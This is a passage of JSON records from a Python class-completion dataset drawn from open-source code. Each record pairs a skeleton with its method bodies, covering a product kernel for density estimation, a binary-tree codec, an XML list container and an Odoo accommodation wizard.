vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.\n- def _fit(self, data_ref: np.ndarray) -> None: Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.\n- def __call__(self, data: np.ndarray) -> np.ndarray: Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.\n\n<|skeleton|>\nclass VanillaProductKernel:\n \"\"\"Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\"\"\"\n\n def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()):\n \"\"\"Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.\"\"\"\n <|body_0|>\n\n def _fit(self, data_ref: np.ndarray) -> None:\n \"\"\"Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.\"\"\"\n <|body_1|>\n\n def __call__(self, data: np.ndarray) -> np.ndarray:\n \"\"\"Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.vartypes = vartypes\n self.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\n self.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\n self.conti_bw_temperature = config.conti_bw_temperature\n self._fit(data_ref)\n<|end_body_0|>\n\n<|body_start_1|>\n self.data_ref = data_ref\n self.bandwidths = []\n for k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)\n<|end_body_1|>\n\n<|body_start_2|>\n gram_matrices = []\n for k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\n return np.array(gram_matrices).prod(axis=0)\n<|end_body_2|>\n", "revision_id": "11eb7b4bb9c39672ece6177e321f63ce205e0307", "skeleton": "<|skeleton|>\nclass VanillaProductKernel:\n \"\"\"Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\"\"\"\n\n def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()):\n \"\"\"Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.\"\"\"\n <|body_0|>\n\n def _fit(self, data_ref: np.ndarray) -> None:\n \"\"\"Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.\"\"\"\n <|body_1|>\n\n def __call__(self, data: np.ndarray) -> np.ndarray:\n \"\"\"Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VanillaProductKernel:\n \"\"\"Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\"\"\"\n\n def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()):\n \"\"\"Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.\"\"\"\n self.vartypes = vartypes\n self.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\n self.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\n self.conti_bw_temperature = config.conti_bw_temperature\n self._fit(data_ref)\n\n def _fit(self, data_ref: np.ndarray) -> None:\n \"\"\"Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.\"\"\"\n self.data_ref = data_ref\n self.bandwidths = []\n for k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)\n\n def __call__(self, data: np.ndarray) -> np.ndarray:\n \"\"\"Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.\"\"\"\n gram_matrices = []\n for k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\n return np.array(gram_matrices).prod(axis=0)\n", "source": "the_stack_v2_python_sparse", "source_path": "causal_data_augmentation/causal_data_augmentation/augmenter/admg_tian_augmenter/util/weight_computer/kernel_fn/vanilla.py", "source_repo": "diadochos/incorporating-causal-graphical-prior-knowledge-into-predictive-modeling-via-simple-data-augmentation", "split": "test", "star_events_count": 0} {"blob_id": "73d639bc2d7ea47fbbc59bffd5942a81f8bc90c5", "bodies": ["queue = deque([root])\nresult = []\nwhile queue:\n node = queue.popleft()\n if node:\n queue.extend([node.left, node.right])\n result.append(str(node.val))\n else:\n result.append('#')\nreturn ' '.join(result)", "if data == '#':\n return None\nnodes = deque(data.split())\nroot = TreeNode(int(nodes.popleft()))\nqueue = deque([root])\nwhile queue:\n node = queue.popleft()\n if node:\n l, r = (nodes.popleft(), nodes.popleft())\n node.left = TreeNode(int(l)) if l != '#' else None\n node.right = TreeNode(int(r)) if r != '#' else None\n queue.extend([node.left, node.right])\nreturn root"], "bodies_text": "<|body_start_0|>\n queue = deque([root])\n result = []\n while queue:\n node = queue.popleft()\n if node:\n queue.extend([node.left, node.right])\n result.append(str(node.val))\n else:\n result.append('#')\n return ' '.join(result)\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '#':\n return None\n nodes = deque(data.split())\n root = TreeNode(int(nodes.popleft()))\n queue = deque([root])\n while queue:\n node = queue.popleft()\n if node:\n l, r = (nodes.popleft(), nodes.popleft())\n node.left = TreeNode(int(l)) if l != '#' else None\n node.right = TreeNode(int(r)) if r != '#' else None\n queue.extend([node.left, node.right])\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n queue = deque([root])\n result = []\n while queue:\n node = queue.popleft()\n if node:\n queue.extend([node.left, node.right])\n result.append(str(node.val))\n else:\n result.append('#')\n return ' '.join(result)\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '#':\n return None\n nodes = deque(data.split())\n root = TreeNode(int(nodes.popleft()))\n queue = deque([root])\n while queue:\n node = queue.popleft()\n if node:\n l, r = (nodes.popleft(), nodes.popleft())\n node.left = TreeNode(int(l)) if l != '#' else None\n node.right = TreeNode(int(r)) if r != '#' else None\n queue.extend([node.left, node.right])\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000428", "length_bytes": 1931, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n queue = deque([root])\n result = []\n while queue:\n node = queue.popleft()\n if node:\n queue.extend([node.left, node.right])\n result.append(str(node.val))\n else:\n result.append('#')\n return ' '.join(result)\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '#':\n return None\n nodes = deque(data.split())\n root = TreeNode(int(nodes.popleft()))\n queue = deque([root])\n while queue:\n node = queue.popleft()\n if node:\n l, r = (nodes.popleft(), nodes.popleft())\n node.left = TreeNode(int(l)) if l != '#' else None\n node.right = TreeNode(int(r)) if r != '#' else None\n queue.extend([node.left, node.right])\n return root\n<|end_body_1|>\n", "revision_id": "1ca8298361b6a030d2569c06a34d955cc5e4b1bb", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n queue = deque([root])\n result = []\n while queue:\n node = queue.popleft()\n if node:\n queue.extend([node.left, node.right])\n result.append(str(node.val))\n else:\n result.append('#')\n return ' '.join(result)\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n if data == '#':\n return None\n nodes = deque(data.split())\n root = TreeNode(int(nodes.popleft()))\n queue = deque([root])\n while queue:\n node = queue.popleft()\n if node:\n l, r = (nodes.popleft(), nodes.popleft())\n node.left = TreeNode(int(l)) if l != '#' else None\n node.right = TreeNode(int(r)) if r != '#' else None\n queue.extend([node.left, node.right])\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "ch14/saeyoon/ch14_6_saeyoon.py", "source_repo": "hyo-eun-kim/algorithm-study", "split": "test", "star_events_count": 0} {"blob_id": "baf3d85d06ee3df698f558f1b5390abe8bedec11", "bodies": ["super(RelaxListType, self).__init__()\nself.list_name = 'relax_list'\nself.list_desc = 'relax list container'\nself.element_name = 'relax_list_element'\nself.element_desc = 'relax container'\nself.blacklist = []", "xml_to_object(super_node, self, file_version=file_version, blacklist=self.blacklist)\nnodes = super_node.getElementsByTagName(self.element_name)\nfor node in nodes:\n self.add_item(node.getAttribute('name'))\n xml_to_object(node, self[-1], file_version=file_version)", "list_element = doc.createElement(self.list_name)\nelement.appendChild(list_element)\nlist_element.setAttribute('desc', self.list_desc)\nblacklist = ['list_name', 'list_desc', 'element_name', 'element_desc', 'blacklist'] + list(self.__dict__.keys()) + list(RelaxListType.__dict__.keys()) + list(self.__class__.__dict__.keys()) + list(list.__dict__.keys()) + list(list.__dict__.keys())\nfill_object_contents(doc, list_element, object=self, blacklist=blacklist)\nfor i in range(len(self)):\n if hasattr(self[i], 'to_xml'):\n self[i].to_xml(doc, list_element)\n else:\n list_item_element = doc.createElement(self.element_name)\n list_element.appendChild(list_item_element)\n list_item_element.setAttribute('index', repr(i))\n list_item_element.setAttribute('desc', self.element_desc)\n blacklist = list(self[i].__class__.__dict__.keys())\n for name in dir(self[i]):\n if name in blacklist:\n continue\n if search('^_', name):\n continue\n obj = getattr(self[i], name)\n if hasattr(obj, 'to_xml'):\n obj.to_xml(doc, list_item_element)\n blacklist = blacklist + [name]\n fill_object_contents(doc, list_item_element, object=self[i], blacklist=blacklist)"], "bodies_text": "<|body_start_0|>\n super(RelaxListType, self).__init__()\n self.list_name = 'relax_list'\n self.list_desc = 'relax list container'\n self.element_name = 'relax_list_element'\n self.element_desc = 'relax container'\n self.blacklist = []\n<|end_body_0|>\n\n<|body_start_1|>\n xml_to_object(super_node, self, file_version=file_version, blacklist=self.blacklist)\n nodes = super_node.getElementsByTagName(self.element_name)\n for node in nodes:\n self.add_item(node.getAttribute('name'))\n xml_to_object(node, self[-1], file_version=file_version)\n<|end_body_1|>\n\n<|body_start_2|>\n list_element = doc.createElement(self.list_name)\n element.appendChild(list_element)\n list_element.setAttribute('desc', self.list_desc)\n blacklist = ['list_name', 'list_desc', 'element_name', 'element_desc', 'blacklist'] + list(self.__dict__.keys()) + list(RelaxListType.__dict__.keys()) + list(self.__class__.__dict__.keys()) + list(list.__dict__.keys()) + list(list.__dict__.keys())\n fill_object_contents(doc, list_element, object=self, blacklist=blacklist)\n for i in range(len(self)):\n if hasattr(self[i], 'to_xml'):\n self[i].to_xml(doc, list_element)\n else:\n list_item_element = doc.createElement(self.element_name)\n list_element.appendChild(list_item_element)\n list_item_element.setAttribute('index', repr(i))\n list_item_element.setAttribute('desc', self.element_desc)\n blacklist = list(self[i].__class__.__dict__.keys())\n for name in dir(self[i]):\n if name in blacklist:\n continue\n if search('^_', name):\n continue\n obj = getattr(self[i], name)\n if hasattr(obj, 'to_xml'):\n obj.to_xml(doc, list_item_element)\n blacklist = blacklist + [name]\n fill_object_contents(doc, list_item_element, object=self[i], blacklist=blacklist)\n<|end_body_2|>\n", "class_docstring": "An empty list type container.", "class_name": "RelaxListType", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RelaxListType:\n \"\"\"An empty list type container.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise some class variables.\"\"\"\n <|body_0|>\n\n def from_xml(self, super_node, file_version=1):\n \"\"\"Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int\"\"\"\n <|body_1|>\n\n def to_xml(self, doc, element):\n \"\"\"Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(RelaxListType, self).__init__()\n self.list_name = 'relax_list'\n self.list_desc = 'relax list container'\n self.element_name = 'relax_list_element'\n self.element_desc = 'relax container'\n self.blacklist = []\n<|end_body_0|>\n\n<|body_start_1|>\n xml_to_object(super_node, self, file_version=file_version, blacklist=self.blacklist)\n nodes = super_node.getElementsByTagName(self.element_name)\n for node in nodes:\n self.add_item(node.getAttribute('name'))\n xml_to_object(node, self[-1], file_version=file_version)\n<|end_body_1|>\n\n<|body_start_2|>\n list_element = doc.createElement(self.list_name)\n element.appendChild(list_element)\n list_element.setAttribute('desc', self.list_desc)\n blacklist = ['list_name', 'list_desc', 'element_name', 'element_desc', 'blacklist'] + list(self.__dict__.keys()) + list(RelaxListType.__dict__.keys()) + list(self.__class__.__dict__.keys()) + list(list.__dict__.keys()) + list(list.__dict__.keys())\n fill_object_contents(doc, list_element, object=self, blacklist=blacklist)\n for i in range(len(self)):\n if hasattr(self[i], 'to_xml'):\n self[i].to_xml(doc, list_element)\n else:\n list_item_element = doc.createElement(self.element_name)\n list_element.appendChild(list_item_element)\n list_item_element.setAttribute('index', repr(i))\n list_item_element.setAttribute('desc', self.element_desc)\n blacklist = list(self[i].__class__.__dict__.keys())\n for name in dir(self[i]):\n if name in blacklist:\n continue\n if search('^_', name):\n continue\n obj = getattr(self[i], name)\n if hasattr(obj, 'to_xml'):\n obj.to_xml(doc, list_item_element)\n blacklist = blacklist + [name]\n fill_object_contents(doc, list_item_element, object=self[i], blacklist=blacklist)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000429", "length_bytes": 10046, "license_type": "no_license", "methods": [{"docstring": "Initialise some class variables.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int", "name": "from_xml", "signature": "def from_xml(self, super_node, file_version=1)"}, {"docstring": "Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object", "name": "to_xml", "signature": "def to_xml(self, doc, element)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005267", "prompt": "Implement the Python class `RelaxListType` described below.\n\nClass description:\nAn empty list type container.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialise some class variables.\n- def from_xml(self, super_node, file_version=1): Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int\n- def to_xml(self, doc, element): Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object", "prompted_full_text": "Implement the Python class `RelaxListType` described below.\n\nClass description:\nAn empty list type container.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialise some class variables.\n- def from_xml(self, super_node, file_version=1): Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int\n- def to_xml(self, doc, element): Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object\n\n<|skeleton|>\nclass RelaxListType:\n \"\"\"An empty list type container.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise some class variables.\"\"\"\n <|body_0|>\n\n def from_xml(self, super_node, file_version=1):\n \"\"\"Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int\"\"\"\n <|body_1|>\n\n def to_xml(self, doc, element):\n \"\"\"Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(RelaxListType, self).__init__()\n self.list_name = 'relax_list'\n self.list_desc = 'relax list container'\n self.element_name = 'relax_list_element'\n self.element_desc = 'relax container'\n self.blacklist = []\n<|end_body_0|>\n\n<|body_start_1|>\n xml_to_object(super_node, self, file_version=file_version, blacklist=self.blacklist)\n nodes = super_node.getElementsByTagName(self.element_name)\n for node in nodes:\n self.add_item(node.getAttribute('name'))\n xml_to_object(node, self[-1], file_version=file_version)\n<|end_body_1|>\n\n<|body_start_2|>\n list_element = doc.createElement(self.list_name)\n element.appendChild(list_element)\n list_element.setAttribute('desc', self.list_desc)\n blacklist = ['list_name', 'list_desc', 'element_name', 'element_desc', 'blacklist'] + list(self.__dict__.keys()) + list(RelaxListType.__dict__.keys()) + list(self.__class__.__dict__.keys()) + list(list.__dict__.keys()) + list(list.__dict__.keys())\n fill_object_contents(doc, list_element, object=self, blacklist=blacklist)\n for i in range(len(self)):\n if hasattr(self[i], 'to_xml'):\n self[i].to_xml(doc, list_element)\n else:\n list_item_element = doc.createElement(self.element_name)\n list_element.appendChild(list_item_element)\n list_item_element.setAttribute('index', repr(i))\n list_item_element.setAttribute('desc', self.element_desc)\n blacklist = list(self[i].__class__.__dict__.keys())\n for name in dir(self[i]):\n if name in blacklist:\n continue\n if search('^_', name):\n continue\n obj = getattr(self[i], name)\n if hasattr(obj, 'to_xml'):\n obj.to_xml(doc, list_item_element)\n blacklist = blacklist + [name]\n fill_object_contents(doc, list_item_element, object=self[i], blacklist=blacklist)\n<|end_body_2|>\n", "revision_id": "c317326ddeacd1a1c608128769676899daeae531", "skeleton": "<|skeleton|>\nclass RelaxListType:\n \"\"\"An empty list type container.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise some class variables.\"\"\"\n <|body_0|>\n\n def from_xml(self, super_node, file_version=1):\n \"\"\"Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int\"\"\"\n <|body_1|>\n\n def to_xml(self, doc, element):\n \"\"\"Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RelaxListType:\n \"\"\"An empty list type container.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise some class variables.\"\"\"\n super(RelaxListType, self).__init__()\n self.list_name = 'relax_list'\n self.list_desc = 'relax list container'\n self.element_name = 'relax_list_element'\n self.element_desc = 'relax container'\n self.blacklist = []\n\n def from_xml(self, super_node, file_version=1):\n \"\"\"Recreate the data structure from the XML node. @param super_node: The XML nodes. @type super_node: xml.dom.minicompat.Element instance @keyword file_version: The relax XML version of the XML file. @type file_version: int\"\"\"\n xml_to_object(super_node, self, file_version=file_version, blacklist=self.blacklist)\n nodes = super_node.getElementsByTagName(self.element_name)\n for node in nodes:\n self.add_item(node.getAttribute('name'))\n xml_to_object(node, self[-1], file_version=file_version)\n\n def to_xml(self, doc, element):\n \"\"\"Create an XML element for the list data structure. @param doc: The XML document object. @type doc: xml.dom.minidom.Document instance @param element: The element to add the list data structure XML element to. @type element: XML element object\"\"\"\n list_element = doc.createElement(self.list_name)\n element.appendChild(list_element)\n list_element.setAttribute('desc', self.list_desc)\n blacklist = ['list_name', 'list_desc', 'element_name', 'element_desc', 'blacklist'] + list(self.__dict__.keys()) + list(RelaxListType.__dict__.keys()) + list(self.__class__.__dict__.keys()) + list(list.__dict__.keys()) + list(list.__dict__.keys())\n fill_object_contents(doc, list_element, object=self, blacklist=blacklist)\n for i in range(len(self)):\n if hasattr(self[i], 'to_xml'):\n self[i].to_xml(doc, list_element)\n else:\n list_item_element = doc.createElement(self.element_name)\n list_element.appendChild(list_item_element)\n list_item_element.setAttribute('index', repr(i))\n list_item_element.setAttribute('desc', self.element_desc)\n blacklist = list(self[i].__class__.__dict__.keys())\n for name in dir(self[i]):\n if name in blacklist:\n continue\n if search('^_', name):\n continue\n obj = getattr(self[i], name)\n if hasattr(obj, 'to_xml'):\n obj.to_xml(doc, list_item_element)\n blacklist = blacklist + [name]\n fill_object_contents(doc, list_item_element, object=self[i], blacklist=blacklist)\n", "source": "the_stack_v2_python_sparse", "source_path": "data_store/data_classes.py", "source_repo": "jlec/relax", "split": "test", "star_events_count": 4} {"blob_id": "e7411ff933694afbcaf5d9dc6a2d04a3b9958d83", "bodies": ["cr, uid, context = self.env.args\nemp_id = self.employee_id.id\nif emp_id:\n bed_id = self.env['beds.beds'].search([('employee_id', '=', self.employee_id.id), ('room_id.accommodation_id', '=', context.get('accommodation_id'))])\n if not bed_id:\n emp_name = self.employee_id.name\n raise ValidationError('The Employee is not accommodated here!' + emp_name)\n self.bed_id = bed_id.id\n self.room_id = bed_id.room_id.id", "for vac_rec in self:\n history_vals = {'bed_id': vac_rec.bed_id.id, 'room_id': vac_rec.room_id.id, 'accommodation_id': vac_rec.room_id.accommodation_id.id, 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT), 'employee_id': vac_rec.bed_id.employee_id.id, 'country_id': vac_rec.bed_id.employee_id.emp_country_id.id, 'type': 'vacant'}\n vac = vac_rec.bed_id.write({'employee_id': False})\n his = self.env['accommodation.history'].create(history_vals)\n vac_upt = vac_rec.employee_id.write({'accommodated': False})\nreturn True"], "bodies_text": "<|body_start_0|>\n cr, uid, context = self.env.args\n emp_id = self.employee_id.id\n if emp_id:\n bed_id = self.env['beds.beds'].search([('employee_id', '=', self.employee_id.id), ('room_id.accommodation_id', '=', context.get('accommodation_id'))])\n if not bed_id:\n emp_name = self.employee_id.name\n raise ValidationError('The Employee is not accommodated here!' + emp_name)\n self.bed_id = bed_id.id\n self.room_id = bed_id.room_id.id\n<|end_body_0|>\n\n<|body_start_1|>\n for vac_rec in self:\n history_vals = {'bed_id': vac_rec.bed_id.id, 'room_id': vac_rec.room_id.id, 'accommodation_id': vac_rec.room_id.accommodation_id.id, 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT), 'employee_id': vac_rec.bed_id.employee_id.id, 'country_id': vac_rec.bed_id.employee_id.emp_country_id.id, 'type': 'vacant'}\n vac = vac_rec.bed_id.write({'employee_id': False})\n his = self.env['accommodation.history'].create(history_vals)\n vac_upt = vac_rec.employee_id.write({'accommodated': False})\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "wiz_vacant_bed", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass wiz_vacant_bed:\n\n def onchange_employee(self):\n \"\"\"This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True\"\"\"\n <|body_0|>\n\n def vacant_bed(self):\n \"\"\"This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cr, uid, context = self.env.args\n emp_id = self.employee_id.id\n if emp_id:\n bed_id = self.env['beds.beds'].search([('employee_id', '=', self.employee_id.id), ('room_id.accommodation_id', '=', context.get('accommodation_id'))])\n if not bed_id:\n emp_name = self.employee_id.name\n raise ValidationError('The Employee is not accommodated here!' + emp_name)\n self.bed_id = bed_id.id\n self.room_id = bed_id.room_id.id\n<|end_body_0|>\n\n<|body_start_1|>\n for vac_rec in self:\n history_vals = {'bed_id': vac_rec.bed_id.id, 'room_id': vac_rec.room_id.id, 'accommodation_id': vac_rec.room_id.accommodation_id.id, 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT), 'employee_id': vac_rec.bed_id.employee_id.id, 'country_id': vac_rec.bed_id.employee_id.emp_country_id.id, 'type': 'vacant'}\n vac = vac_rec.bed_id.write({'employee_id': False})\n his = self.env['accommodation.history'].create(history_vals)\n vac_upt = vac_rec.employee_id.write({'accommodated': False})\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000430", "length_bytes": 3454, "license_type": "no_license", "methods": [{"docstring": "This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True", "name": "onchange_employee", "signature": "def onchange_employee(self)"}, {"docstring": "This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True", "name": "vacant_bed", "signature": "def vacant_bed(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003084", "prompt": "Implement the Python class `wiz_vacant_bed` described below.\n\nClass description:\nImplement the wiz_vacant_bed class.\n\nMethod signatures and docstrings:\n- def onchange_employee(self): This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True\n- def vacant_bed(self): This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True", "prompted_full_text": "Implement the Python class `wiz_vacant_bed` described below.\n\nClass description:\nImplement the wiz_vacant_bed class.\n\nMethod signatures and docstrings:\n- def onchange_employee(self): This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True\n- def vacant_bed(self): This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True\n\n<|skeleton|>\nclass wiz_vacant_bed:\n\n def onchange_employee(self):\n \"\"\"This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True\"\"\"\n <|body_0|>\n\n def vacant_bed(self):\n \"\"\"This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cr, uid, context = self.env.args\n emp_id = self.employee_id.id\n if emp_id:\n bed_id = self.env['beds.beds'].search([('employee_id', '=', self.employee_id.id), ('room_id.accommodation_id', '=', context.get('accommodation_id'))])\n if not bed_id:\n emp_name = self.employee_id.name\n raise ValidationError('The Employee is not accommodated 